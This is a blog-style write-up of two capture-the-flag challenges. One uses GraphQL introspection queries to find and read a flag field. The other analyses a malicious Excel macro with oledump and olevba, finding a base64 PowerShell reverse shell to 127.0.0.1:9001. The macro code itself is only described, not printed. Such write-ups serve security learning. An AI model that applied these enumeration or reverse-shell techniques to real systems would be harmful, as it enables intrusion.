This year i attended the SheHacks Annual InterVasity CTF, a two day event hosted at USIU-Africa. It was a fun experience except the tough CTF challenges 😨. This is a write-up of the few i managed to solve. 😌
Graph1#
The link took us to this page which says "Graphql running..."
With basic paths check for the graphql instance i found it runs on graphql
.
The next step is to enumerate all available types anf fields with the introspection query query={__schema{types{name,fields{name}}}}
to discover the schema information.
With the introspection we uncover getFlag
field which likely retrieves the contents of the Flagtable.
Sending query={getFlag {id flag}}
returns a base64 encoded flag value.
Decoding… Voila!😮
Adress#
This was an easy challenge that required knowledge in analyzing macro-based source code.Macro based malware are scripts(js, powershell,vbs) that are embedded inside Ms office documents to abuse the macro feature.
To view if there exists any macro emmbeded scripts in a document we use oledump.py
or olevba
tools.
The letter M
next to the stream indicates that the stream contains Macro emmbeded code. We could use oledump.py books.xls -s 8 -d
to read the code but olevba books.xls
does a better job.
We can see the macro source codes for module 1 ans 2. Module 1 is a Visual Script that checks the document properties and executes the value for the property named comments. If we examine the file properties, comments has a value that spawns the command prompt and output Oops
.
The second script is a powershell code that executes what seems to be a base64 encoded string. let’s uncover what that is.
It seems to be a basic PowerShell reverse shell that listens for commands from a local server(127.0.0.1) and executes those command. The challege asked for the Ip adress and the port, SHCTF{127.0.0.1:9001}
😃.